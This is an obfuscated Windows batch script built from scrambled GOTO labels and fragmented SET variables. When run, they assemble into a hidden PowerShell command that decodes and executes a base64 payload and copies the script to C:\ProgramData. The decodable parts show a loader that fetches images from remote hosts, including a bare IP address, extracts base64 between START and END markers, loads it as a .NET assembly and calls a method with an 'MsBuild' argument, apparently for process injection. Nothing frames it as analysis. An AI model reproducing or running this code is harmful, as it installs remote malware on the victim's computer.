@echo off
GOTO KIGFIGFDDO
:JSFKGUSOGN
SET FDOOFGGIGG=oAIAAgACAAIAAgACAAIAAgACQAcwB0AGEAcgB0AFAAbwBzACAAKwA9A
GOTO DDSUDJUDJG7
:OOONIDODFD
SET IGDDOHOOGN=gAYwB2AHMALwBuAGkAYQBtAC8AcwBkAGEAZQBoAC8AcwBmAGUAcgAvADEAMwA3ADMANwAzADMAcABjAHYALwAzADgAOAA
GOTO NOJIIJGUDS2
:NOJIIJGUDS
SET IOUDGHDJIO=G8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAKAAoAZgB1AG4AYwB0A
GOTO GOGJNJGISG
:NOJIIJGUDS2
SET FFNISHDGGI=1AGkAcgB1AHkALwBtAG8AYwAuAHQAbgBlAHQAbgBvAGMAcgBlAHMAdQBiAHUAaAB0AGkAZwAuAHcAYQByAC
GOTO NOJIIJGUDS3
:KJIUGDGOGG
SET INOJSIDJIS=AKQAKAAoAIAAgACAAIABpAGYAIAAoACQAcwB0AGEAcgB0AFAAbwBzACAALQBnAGUAIAAwA
GOTO DDSUDJUDJG5
:DJGOONNGOJ
SET IGDGFFNJKI=IAArACAAJwAxADAANwAuADEANwAzAC4AMgAyADcALgAxADIANgAvAGkAbQBnAC8AMQAuAGoAcABnACcAKQAKACkACgAKACQ
GOTO SJJFGIGGIO5
:JSKGOODGFG
SET GJFIDOFGNN=ANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBoAHUAbgBrACkACgAgACAAIAAgACAAIAAgACAAJABsAG8AYQBkAGUA
GOTO DFIUDKODKF
:ODNFDDKHNG
SET DGFGOJOOII=AAgACAAIAAgACAAIAApAAoAIAAgACAAIAB9AAoAf@QA='';$oW
GOTO DDSNNFOJGS
:IKFOGFNFOD
SET SGNIFDFOJD=AkAHQAYQByAGcAZQB0AFQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAbQAuAEcAZQB0AFQAeQBwAGUAKAAnAG0Ae
GOTO NIGSFJDODG7
:NOJIIJGUDS5
SET NOOGFSDIFN=AMQAxACkACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAJAB0AGEAcgBnAGUAdABUAHkAcABlAC4ARwBlAHQ
GOTO NOJIIJGUDS6
:DDSUDJUDJG
SET SSDDDJFFDS=ZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5A
GOTO NIGSFJDODG
:DDSNNFOJGS
SET GFSJDNNGGO=gjffuxd = [system.Text.encoding]::Unicode.GetString^([sy
GOTO NHOJDGFGKF
:SJJFGIGGIO
SET JIJJDKGGDD=ll.exe -WindowStyle Hidden -ArgumentList '-Command \"$jghjggghhjg = ''WwBOAGUAdAAuAFMA
GOTO DDSUDJUDJG
:UFFDJGODOO
%GSUOOKIFFI%%INFISOSIGG%%JIJJDKGGDD%%SSDDDJFFDS%%NNFDNHDIJJ%%IOUDGHDJIO%%NJGDOJOFND%%DGFFGDOONF%%FNONDFIGOU%%GOIIDSGOJD%%NGIIODNNFS%%GOGFDFSGIJ%%SDOFJDUGIH%%JIIFSOHGDD%%DDIIFDGOON%%NFFNOJNOJF%%JGODGOIOJD%%GGGGJSGNOO%%GHIHKGFNNK%%FDGDFJOFSK%%HIJINNNIDD%%IOGIIOOIOS%%IIUGSFDHJI%%DIONNFSFJN%%IGDGFFNJKI%%JFGGNOINOS%%SOSOFNJDON%%NNIGNOFGGI%%SOOGGFFIGG%%FFDFGODFGJ%%JGNSDDNIOG%%GOIUFOFFIU%%DDIIOINDID%%DDJDGJOOGG%%INOJSIDJIS%%IFDDFFSJNI%%FDOOFGGIGG%%FGGNGOFJIJ%%KHGDOJDGDI%%SSDGGISGNS%%GOUFNSHFDD%%ONDFNJIGGN%%UDGDIFNGIG%%GJFIDOFGNN%%FOODGIOFNF%%JOFKGOOIFO%%SGNIFDFOJD%%OONGFDGUGN%%GNJNGIFOSG%%GGDIOIGIGG%%JOFGFDNDOO%%IGDDOHOOGN%%FFNISHDGGI%%FDGJHGHGIN%%GKJJKFOGDJ%%NOOGFSDIFN%%NGKNDFKUNG%%OGIOJSFHNG%%SJGFODDFGD%%DSOFOHJOND%%DGFGOJOOII%%GFSJDNNGGO%%ISJFFNGJJD%%GFDNFOFDNU%%IJOGINDINO%
GOTO GOGJNJGISG6
:SJJFGIGGIO3
SET DIONNFSFJN=LwBjAGgALgBqAHAAZwAnACkALAAKACAAIAAgACAAKAAkAGIAYQBzAGUAVQByAGwA
GOTO DJGOONNGOJ
:UIGIIUIDUS
SET NFFNOJNOJF=IAAgAH0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsAAoAf@QAKACQA
GOTO FFNFGFODJU6
:SJJFGIGGIO8
SET SOOGGFFIGG=gAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AEQAYQB0AG
GOTO SJJFGIGGIO9
:DFIUDKODKF
SET FOODGIOFNF=ZABBAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQB
GOTO NIGSFJDODG5
:NHOJDGFGKF
SET ISJFFNGJJD=stem.convert]::Frombase64string^( [regex]::replace^($jghjggghhjg, ''f@'',''f''^)^)^);
GOTO DUGFIGDNGU
:IDJDNDDSFF
SET FDGDFJOFSK=B0AG4AYQBtAGUAKQAgAC0AbABpAGsAZQAgACcAKgBjAGwAZQBhAG4AKgAnACkAIAB7AAoAIAAg
GOTO SJJFGIGGIO0
:ISNDODOFHD
SET GOIIDSGOJD=AVwBlAGIAQwBsAGkAZQBuAHQACgAgACAAIAAgACQAcgBhAG4AZABvAG0ATwByAGQAZQByACAAPQAgAEcAZQB0AC0AU
GOTO FFNFGFODJU0
:SJJFGIGGIO0
SET HIJINNNIDD=ACAAIABlAHgAaQB0AAoAf@QAKACQAdABhAHIAZwBlAHQAVQByAGwAcwAgAD0AIABAACgAC
GOTO SJJFGIGGIO1
:IJJFGDNGIJ
SET GOUFNSHFDD=pAG4AZwAoACQAcwB0AGEAcgB0AFAAbwBzACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoA
GOTO NIGSFJDODG1
:SJJFGIGGIO2
SET IIUGSFDHJI=ZQBpAG4AcwBpAGcAbgBpAGEALgBjAG8ALgB6AGEALwBrAGkAegB6AHkA
GOTO SJJFGIGGIO3
:SJJFGIGGIO9
SET FFDFGODFGJ=EAKQAKACAAIAAgACAAJABzAHQAYQByAHQAVABhAGcAIAA9ACAAJwA8ADwAUwBUAEEAUgAnACAAKwAnAFQAPgA+AC
GOTO DDSUDJUDJG0
:DDSUDJUDJG0
SET JGNSDDNIOG=cACgAgACAAIAAgACQAZQBuAGQAVABhAGcAIAAgACAAPQAgACcAPAA8AEUATgBEAD4APgAnAAoACgAgACAAIAAgACQAcwB0AGE
GOTO DDSUDJUDJG1
:NOJIIJGUDS6
SET NGKNDFKUNG=ATQBlAHQAaABvAGQAKAAnAHIAdQBuACcAIAArACAAJwBzAHMAJwApAC4ASQBuAH
GOTO NOJIIJGUDS7
:DDSUDJUDJG3
SET DDJDGJOOGG=AAgACAAPQAgACQAdABlAHgAdABDAG8AbgB0AGUAbgB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQAVABhAGc
GOTO KJIUGDGOGG
:NIGSFJDODG
SET NNFDNHDIJJ=FAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjA
GOTO NOJIIJGUDS
:FOJOOKJHIK
SET DGFFGDOONF=ByAGkAbgBnAFsAXQBdACQAdQByAGwAcwApAAoAIAAgACAAIAAkAGMAbABpAGUAbgB0ACAAPQA
GOTO JDNOSJDGFK
:SJJFGIGGIO7
SET NNIGNOFGGI=AoAIAAgACAAIAAkAHQAZQB4AHQAQwBvAG4AdABlAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAH
GOTO SJJFGIGGIO8
:NIGSFJDODG1
SET ONDFNJIGGN=CkACgAKACAAIAAgACAAIAAgACAAIAAkAGEAcwBzAGUAbQBiAGwA
GOTO NIGSFJDODG2
:IFGUNIFOND
SET JIIFSOHGDD=gBuACAAJABjAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1
GOTO FFNFGFODJU4
:SJJFGIGGIO6
SET SOSOFNJDON=gBsAHMACgBpAGYAIAAoACQAcgBhAHcARABhAHQAYQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7A
GOTO SJJFGIGGIO7
:DDSUDJUDJG9
SET SSDGGISGNS=gACAAJABiAGEAcwBlADYANABDAGgAdQBuAGsAIAA9ACAAJAB0AGUAeAB0AEMAbwBuAHQAZQBuAHQALgBTAHUAYgBzAHQAcgB
GOTO IJJFGDNGIJ
:KIGFIGFDDO
SET GSUOOKIFFI=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Comm
GOTO FFNFGFODJU
:NIGSFJDODG8
SET GNJNGIFOSG=IAAgACAAIAAgACAAIAAkAGkAbgBqAFYAYQBsAHUAZQAgAD0AIAAnAE0AcwBCAHUAaQBsAGQAJwAKACAAIAAgACAAIAA
GOTO NIGSFJDODG9
:DDSUDJUDJG5
SET IFDDFFSJNI=CAALQBhAG4AZAAgACQAZQBuAGQAUABvAHMAIAAtAGcAdAAgACQAcwB0AGEAcgB0AFAAbwBzACkAIAB7AA
GOTO JSFKGUSOGN
:FFNFGFODJU
SET INFISOSIGG=and "Start-Process $env:SystemRoot\System32\WindowsPowerShell\v1.0\powershe
GOTO SJJFGIGGIO
:FFNFGFODJU8
SET GHIHKGFNNK=KwAgACQAcwBjAGgAZQBtAGUAMgAKAGkAZgAgACgAKABoAG8Acw
GOTO IDJDNDDSFF
:DDSUDJUDJG7
SET FGGNGOFJIJ=CAAJABzAHQAYQByAHQAVABhAGcALgBMAGUAbgBnAHQAaAAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEwAZQBu
GOTO DDSUDJUDJG8
:DUGFIGDNGU
SET GFDNFOFDNU=iex $oWgjffuxd\"'";Copy-Item -Path '%~f0' -Destination 'C:\ProgramData\.bat' -Force -ErrorAction 
GOTO UUNHGDDGDO
:NOJIIJGUDS9
SET DSOFOHJOND=wB0AHIALAAgACcAJwAsACAAJABpAG4AagBWAGEAbAB1AGUALAAgACcAMAAnACwAIAAnAHgAOAA2ACcAKQAKACAAI
GOTO ODNFDDKHNG
:JDNOSJDGFK
SET FNONDFIGOU=gAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4
GOTO ISNDODOFHD
:SJJFGIGGIO1
SET IOGIIOOIOS=gAgACAAIAAgACgAJABiAGEAcwBlAFUAcgBsACAAKwAgACcAcwBpAGcAbgBhAGcA
GOTO SJJFGIGGIO2
:NIGSFJDODG5
SET JOFKGOOIFO=dADoAOgBMAG8AYQBkACgAJABhAHMAcwBlAG0AYgBsAHkAQgB5AHQAZQBzACkACgAKACAAIAAgACAAIAAgACAAIA
GOTO IKFOGFNFOD
:FFNFGFODJU0
SET NGIIODNNFS=gBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAdQByAGwAcwAgAC0AQwBvAHUAbgB0ACAAJAB1AHIAbABzA
GOTO FFNFGFODJU1
:FFNFGFODJU1
SET GOGFDFSGIJ=C4ATABlAG4AZwB0AGgACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAdQAgAGkAbgAgACQAcgBhAG4AZABvAG0ATwB
GOTO FFNFGFODJU2
:SJJFGIGGIO5
SET JFGGNOINOS=AcgBhAHcARABhAHQAYQAgAD0AIABHAGUAdAAtAFIAZQBtAG8AdABlAEQAYQB0AGEAIAAkAHQAYQByAGcAZQB0AFUAc
GOTO SJJFGIGGIO6
:FFNFGFODJU2
SET SDOFJDUGIH=yAGQAZQByACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAewAgAHIAZQB0AHUAc
GOTO IFGUNIFOND
:NIGSFJDODG9
SET GGDIOIGIGG=gACAAIAAkAHMAdAByACAAPQAgACcAMQAnAAoAIAAgACAAIAAgACAAIAAgACQAZw
GOTO NOJIIJGUDS0
:NIGSFJDODG2
SET UDGDIFNGIG=eQBCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADY
GOTO JSKGOODGFG
:UUNHGDDGDO
SET IJOGINDINO=SilentlyContinue"
GOTO UFFDJGODOO
:NOJIIJGUDS7
SET OGIOJSFHNG=YAbwBrAGUAKAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgB1AGwAbAAsAAoAIAAgACAAIAAgACAAIAAgA
GOTO NOJIIJGUDS8
:GOGJNJGISG
SET NJGDOJOFND=GkAbwBuACAARwBlAHQALQBSAGUAbQBvAHQAZQBEAGEAdABhACAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKABbAHMAdA
GOTO FOJOOKJHIK
:FFNFGFODJU6
SET JGODGOIOJD=cwBjAGgAZQBtAGUAMQAgAD0AIAAnAGgAdAB0ACcACgAkAHMAYwBoAGUAbQBlADIAIAA9ACAAJwBwADoALwAv
GOTO FFNFGFODJU7
:FFNFGFODJU7
SET GGGGJSGNOO=ACcACgAkAGIAYQBzAGUAVQByAGwAIAA9ACAAJABzAGMAaABlAG0AZQAxACAA
GOTO FFNFGFODJU8
:NOJIIJGUDS4
SET GKJJKFOGDJ=cAZwAgAD0AIAAkAGcAZwBnAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAIAAkAGcAZwBnAC4ATABlAG4AZwB0AGgAIAAtACA
GOTO NOJIIJGUDS5
:DDSUDJUDJG2
SET DDIIOINDID=ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AFQAYQBnACkACgAgACAAIAAgACQAZQBuAGQAUABvAHMAI
GOTO DDSUDJUDJG3
:NOJIIJGUDS0
SET JOFGFDNDOO=BnAGcAIAA9ACAAJwB0AHgAdAAuAGQAYQBvAGwAcAB1AHQAcwBvAG
GOTO OOONIDODFD
:FFNFGFODJU4
SET DDIIFDGOON=ACkAIAB9ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0ACgAgACAA
GOTO UIGIIUIDUS
:NIGSFJDODG7
SET OONGFDGUGN=QBwAHIAbwBnAHIAYQBtAC4ASABvAG0AZQBlAHMAJwApAAoAIAAgACAAIAAgACAAIAAKACAA
GOTO NIGSFJDODG8
:NOJIIJGUDS3
SET FDGJHGHGIN=8ALwA6AHMAIABnAHMAZgBoAGoAZwBmAHMAZwBmACcAIAA7ACAAJABnAG
GOTO NOJIIJGUDS4
:DDSUDJUDJG8
SET KHGDOJDGDI=AGcAdABoACAAPQAgACQAZQBuAGQAUABvAHMAIAAtACAAJABzAHQAYQByAHQAUABvAHMACgAgACAAIAAgACAAIAA
GOTO DDSUDJUDJG9
:DDSUDJUDJG1
SET GOIUFOFFIU=AcgB0AFAAbwBzACAAPQAgACQAdABlAHgAdABDAG8AbgB0AGUAbgB0AC4
GOTO DDSUDJUDJG2
:NOJIIJGUDS8
SET SJGFODDFGD=CAAIAAgACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJABnAGcAZwAgACAALAAgACQAc
GOTO NOJIIJGUDS9
:GOGJNJGISG6